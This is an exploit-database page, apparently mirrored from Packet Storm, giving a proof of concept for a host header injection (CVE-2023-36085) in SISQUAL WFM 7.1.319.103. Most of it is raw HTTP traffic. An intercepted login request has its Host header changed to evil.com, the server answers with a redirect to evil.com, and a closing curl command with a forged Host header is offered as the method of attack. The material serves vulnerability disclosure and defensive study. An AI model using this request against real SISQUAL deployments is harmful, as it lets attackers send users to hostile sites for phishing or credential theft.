Share
## https://sploitus.com/exploit?id=PACKETSTORM:176991
# Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection  
# Discovered Date: 17/03/2023  
# Reported Date: 17/03/2023  
# Exploit Author: Omer Shaik (unknown_exploit)  
# Vendor Homepage: https://www.sisqualwfm.com  
# Version: 7.1.319.103  
# Tested on: SISQUAL WFM 7.1.319.103  
# Affected Version: sisqualWFM - 7.1.319.103  
# Fixed Version: sisqualWFM - 7.1.319.111  
# CVE : CVE-2023-36085  
# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)  
# Category: Web Apps  
# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085  
  
  
  
A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.  
  
****************************************************************************************************  
Orignal Request  
****************************************************************************************************  
GET /sisqualIdentityServer/core/login HTTP/2  
Host: sisqualwfm.cloud  
Cookie:<cookie>  
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Linux"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
  
****************************************************************************************************  
Orignal Response  
****************************************************************************************************  
HTTP/2 302 Found  
Cache-Control: no-store, no-cache, must-revalidate  
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/  
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload  
X-Content-Type-Options: nosniff  
X-Frame-Options: sameorigin  
Date: Wed, 22 Mar 2023 13:22:10 GMT  
Content-Length: 0  
****************************************************************************************************  
  
  
  
  
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  
โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•  
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   
โ–ˆโ–ˆโ•”โ•โ•โ•โ• โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   
โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  
โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ•  
  
  
  
  
****************************************************************************************************  
Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)  
****************************************************************************************************  
GET /sisqualIdentityServer/core/login HTTP/2  
Host: evil.com  
Cookie:<cookie>  
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Linux"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
  
****************************************************************************************************  
Response  
****************************************************************************************************  
HTTP/2 302 Found  
Cache-Control: no-store, no-cache, must-revalidate  
Location: https://evil.com/sisqualIdentityServer/core/  
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload  
X-Content-Type-Options: nosniff  
X-Frame-Options: sameorigin  
Content-Length: 0  
  
  
****************************************************************************************************  
Method of Attack  
****************************************************************************************************  
  
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv  
  
****************************************************************************************************